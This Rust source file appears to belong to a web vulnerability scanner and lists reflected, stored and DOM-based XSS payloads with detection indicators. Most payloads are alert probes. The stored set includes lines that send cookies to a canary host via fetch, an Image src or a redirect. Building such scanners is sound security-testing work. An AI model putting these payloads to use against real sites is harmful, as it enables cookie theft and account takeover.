use crate::domain::active_vuln::{ExpectedIndicator, PayloadDefinition};
use crate::domain::entities::SeverityLevel;

pub fn get_reflected_payloads() -> Vec<PayloadDefinition> {
    vec![
        PayloadDefinition {
            id: "xss_reflected_01".into(),
            payload: "<script>alert('XSS')</script>".into(),
            description: "Basic script tag injection".into(),
            expected_indicator: ExpectedIndicator::ReflectedContent("<script>alert('XSS')</script>".into()),
            severity: SeverityLevel::High,
            safe_for_production: true,
        },
        PayloadDefinition {
            id: "xss_reflected_02".into(),
            payload: "<img src=x onerror=alert('XSS')>".into(),
            description: "Image tag with onerror event handler".into(),
            expected_indicator: ExpectedIndicator::ReflectedContent("onerror=alert".into()),
            severity: SeverityLevel::High,
            safe_for_production: true,
        },
        PayloadDefinition {
            id: "xss_reflected_03".into(),
            payload: "\"><script>alert(document.domain)</script>".into(),
            description: "Attribute breakout with script injection".into(),
            expected_indicator: ExpectedIndicator::ReflectedContent("<script>alert(document.domain)</script>".into()),
            severity: SeverityLevel::High,
            safe_for_production: true,
        },
        PayloadDefinition {
            id: "xss_reflected_04".into(),
            payload: "'-alert(1)-'".into(),
            description: "JavaScript context breakout (single-quote string)".into(),
            expected_indicator: ExpectedIndicator::ReflectedContent("'-alert(1)-'".into()),
            severity: SeverityLevel::High,
            safe_for_production: true,
        },
        PayloadDefinition {
            id: "xss_reflected_05".into(),
            payload: "<svg/onload=alert('XSS')>".into(),
            description: "SVG tag with onload event".into(),
            expected_indicator: ExpectedIndicator::ReflectedContent("onload=alert".into()),
            severity: SeverityLevel::High,
            safe_for_production: true,
        },
        PayloadDefinition {
            id: "xss_reflected_06".into(),
            payload: "javascript:alert(1)".into(),
            description: "JavaScript URI scheme injection".into(),
            expected_indicator: ExpectedIndicator::ReflectedContent("javascript:alert".into()),
            severity: SeverityLevel::High,
            safe_for_production: true,
        },
        PayloadDefinition {
            id: "xss_reflected_07".into(),
            payload: "<body onload=alert('XSS')>".into(),
            description: "Body tag with onload event".into(),
            expected_indicator: ExpectedIndicator::ReflectedContent("onload=alert".into()),
            severity: SeverityLevel::High,
            safe_for_production: true,
        },
        PayloadDefinition {
            id: "xss_reflected_08".into(),
            payload: "<details open ontoggle=alert('XSS')>".into(),
            description: "HTML5 details/ontoggle event".into(),
            expected_indicator: ExpectedIndicator::ReflectedContent("ontoggle=alert".into()),
            severity: SeverityLevel::High,
            safe_for_production: true,
        },
        PayloadDefinition {
            id: "xss_reflected_09".into(),
            payload: "{{constructor.constructor('alert(1)')()}}".into(),
            description: "Template injection / Angular sandbox escape".into(),
            expected_indicator: ExpectedIndicator::ReflectedContent("constructor.constructor".into()),
            severity: SeverityLevel::High,
            safe_for_production: true,
        },
        PayloadDefinition {
            id: "xss_reflected_10".into(),
            payload: "<iframe src=\"javascript:alert('XSS')\">".into(),
            description: "Iframe with javascript URI".into(),
            expected_indicator: ExpectedIndicator::ReflectedContent("javascript:alert".into()),
            severity: SeverityLevel::High,
            safe_for_production: true,
        },
        PayloadDefinition {
            id: "xss_reflected_11".into(),
            payload: "\"-alert(1)-\"".into(),
            description: "JavaScript context breakout (double-quote string)".into(),
            expected_indicator: ExpectedIndicator::ReflectedContent("\"-alert(1)-\"".into()),
            severity: SeverityLevel::High,
            safe_for_production: true,
        },
        PayloadDefinition {
            id: "xss_reflected_12".into(),
            payload: "</script><script>alert(1)</script>".into(),
            description: "Script tag breakout".into(),
            expected_indicator: ExpectedIndicator::ReflectedContent("</script><script>alert(1)</script>".into()),
            severity: SeverityLevel::High,
            safe_for_production: true,
        },
        PayloadDefinition {
            id: "xss_reflected_13".into(),
            payload: "jaVasCript:/*-/*`/*\\`/*'/*\"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\\x3csVg/<sVg/oNloAd=alert()//>\\x3e".into(),
            description: "Polyglot payload".into(),
            expected_indicator: ExpectedIndicator::ReflectedContent("oNloAd=alert()".into()),
            severity: SeverityLevel::High,
            safe_for_production: true,
        },
        PayloadDefinition {
            id: "xss_reflected_14".into(),
            payload: "javascript://%250Aalert(1)".into(),
            description: "JavaScript URI with encoded newline".into(),
            expected_indicator: ExpectedIndicator::ReflectedContent("alert(1)".into()),
            severity: SeverityLevel::High,
            safe_for_production: true,
        },
        PayloadDefinition {
            id: "xss_reflected_15".into(),
            payload: "<svg><animatetransform onbegin=alert(1) attributeName=transform>".into(),
            description: "SVG animatetransform onbegin".into(),
            expected_indicator: ExpectedIndicator::ReflectedContent("onbegin=alert(1)".into()),
            severity: SeverityLevel::High,
            safe_for_production: true,
        },
        PayloadDefinition {
            id: "xss_reflected_16".into(),
            payload: "<video><source onerror=\"alert(1)\">".into(),
            description: "Video source onerror".into(),
            expected_indicator: ExpectedIndicator::ReflectedContent("onerror=\"alert(1)\"".into()),
            severity: SeverityLevel::High,
            safe_for_production: true,
        },
        PayloadDefinition {
            id: "xss_reflected_17".into(),
            payload: "<a href=\"j&Tab;a&Tab;v&Tab;asc&Tab;ri&Tab;pt:alert&lpar;1&rpar;\">".into(),
            description: "HTML entities encoded javascript URI".into(),
            expected_indicator: ExpectedIndicator::ReflectedContent("pt:alert&lpar;1&rpar;".into()),
            severity: SeverityLevel::High,
            safe_for_production: true,
        },
        PayloadDefinition {
            id: "xss_reflected_18".into(),
            payload: "javascript:eval('var a=document.createElement(\\'script\\');a.src=\\'https://xss.canary\\';document.body.appendChild(a)')".into(),
            description: "Eval dynamic script insertion".into(),
            expected_indicator: ExpectedIndicator::ReflectedContent("createElement(\\'script\\')".into()),
            severity: SeverityLevel::High,
            safe_for_production: true,
        },
        PayloadDefinition {
            id: "xss_reflected_19".into(),
            payload: "<math><a xlink:href=\"//jsfiddle.net/t846h/\">click".into(),
            description: "MathML xlink:href".into(),
            expected_indicator: ExpectedIndicator::ReflectedContent("xlink:href".into()),
            severity: SeverityLevel::High,
            safe_for_production: true,
        },
        PayloadDefinition {
            id: "xss_reflected_20".into(),
            payload: "<object data=\"data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==\">".into(),
            description: "Base64 encoded data URI object".into(),
            expected_indicator: ExpectedIndicator::ReflectedContent("data:text/html;base64,".into()),
            severity: SeverityLevel::High,
            safe_for_production: true,
        },
    ]
}

pub fn get_stored_payloads() -> Vec<PayloadDefinition> {
    vec![
        PayloadDefinition {
            id: "xss_stored_01".into(),
            payload: "<script>fetch('https://limma-xss-canary.test/'+document.cookie)</script>".into(),
            description: "Cookie-stealing stored XSS canary".into(),
            expected_indicator: ExpectedIndicator::ReflectedContent("limma-xss-canary".into()),
            severity: SeverityLevel::Critical,
            safe_for_production: false,
        },
        PayloadDefinition {
            id: "xss_stored_02".into(),
            payload: "<img src=x onerror=\"new Image().src='https://limma-xss-canary.test/?c='+document.cookie\">".into(),
            description: "Image-based cookie exfil".into(),
            expected_indicator: ExpectedIndicator::ReflectedContent("limma-xss-canary".into()),
            severity: SeverityLevel::Critical,
            safe_for_production: false,
        },
        PayloadDefinition {
            id: "xss_stored_03".into(),
            payload: "\"><iframe src=\"javascript:alert(document.cookie)\"></iframe>".into(),
            description: "Iframe showing cookies".into(),
            expected_indicator: ExpectedIndicator::ReflectedContent("alert(document.cookie)".into()),
            severity: SeverityLevel::Critical,
            safe_for_production: false,
        },
        PayloadDefinition {
            id: "xss_stored_04".into(),
            payload: "<svg/onload=fetch('https://limma-xss-canary.test/xss?domain='+document.domain)>".into(),
            description: "SVG fetching canary".into(),
            expected_indicator: ExpectedIndicator::ReflectedContent("limma-xss-canary.test".into()),
            severity: SeverityLevel::Critical,
            safe_for_production: false,
        },
        PayloadDefinition {
            id: "xss_stored_05".into(),
            payload: "<body/onload=document.location='https://limma-xss-canary.test/?c='+document.cookie>".into(),
            description: "Body onload redirect".into(),
            expected_indicator: ExpectedIndicator::ReflectedContent("limma-xss-canary.test".into()),
            severity: SeverityLevel::Critical,
            safe_for_production: false,
        }
    ]
}

pub fn get_dom_payloads() -> Vec<PayloadDefinition> {
    vec![
        PayloadDefinition {
            id: "xss_dom_01".into(),
            payload: "#<img src=x onerror=alert(1)>".into(),
            description: "Hash-based DOM XSS via innerHTML".into(),
            expected_indicator: ExpectedIndicator::ReflectedContent("onerror=alert".into()),
            severity: SeverityLevel::High,
            safe_for_production: true,
        },
        PayloadDefinition {
            id: "xss_dom_02".into(),
            payload: "?default=<script>alert(document.domain)</script>".into(),
            description: "Query parameter DOM sink injection".into(),
            expected_indicator: ExpectedIndicator::ReflectedContent("<script>alert".into()),
            severity: SeverityLevel::High,
            safe_for_production: true,
        },
        PayloadDefinition {
            id: "xss_dom_03".into(),
            payload: "#javascript:alert(1)".into(),
            description: "Hash-based javascript URI execution".into(),
            expected_indicator: ExpectedIndicator::ReflectedContent("javascript:alert".into()),
            severity: SeverityLevel::High,
            safe_for_production: true,
        },
        PayloadDefinition {
            id: "xss_dom_04".into(),
            payload: "?url=javascript:alert(1)".into(),
            description: "Query based javascript URI execution".into(),
            expected_indicator: ExpectedIndicator::ReflectedContent("javascript:alert(1)".into()),
            severity: SeverityLevel::High,
            safe_for_production: true,
        },
        PayloadDefinition {
            id: "xss_dom_05".into(),
            payload: "#\"><svg/onload=alert(1)>".into(),
            description: "Hash-based breakout".into(),
            expected_indicator: ExpectedIndicator::ReflectedContent("<svg/onload=alert(1)>".into()),
            severity: SeverityLevel::High,
            safe_for_production: true,
        }
    ]
}
